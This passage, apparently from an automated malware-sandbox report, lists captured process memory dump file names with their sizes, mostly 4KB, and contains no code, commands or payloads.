                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-314-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5080-356-0x0000000007E30000-0x0000000007E31000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-354-0x0000000007C80000-0x0000000007C81000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-348-0x0000000007A70000-0x0000000007A71000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-334-0x0000000007440000-0x0000000007441000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-336-0x00000000049F2000-0x00000000049F3000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-327-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-425-0x00000000094E0000-0x00000000094E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-372-0x0000000008520000-0x0000000008521000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-428-0x0000000008710000-0x0000000008711000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5080-430-0x0000000009470000-0x0000000009471000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5256-489-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5320-427-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5328-426-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5400-433-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5424-434-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5604-447-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5612-448-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5664-451-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5968-453-0x0000000000000000-mapping.dmp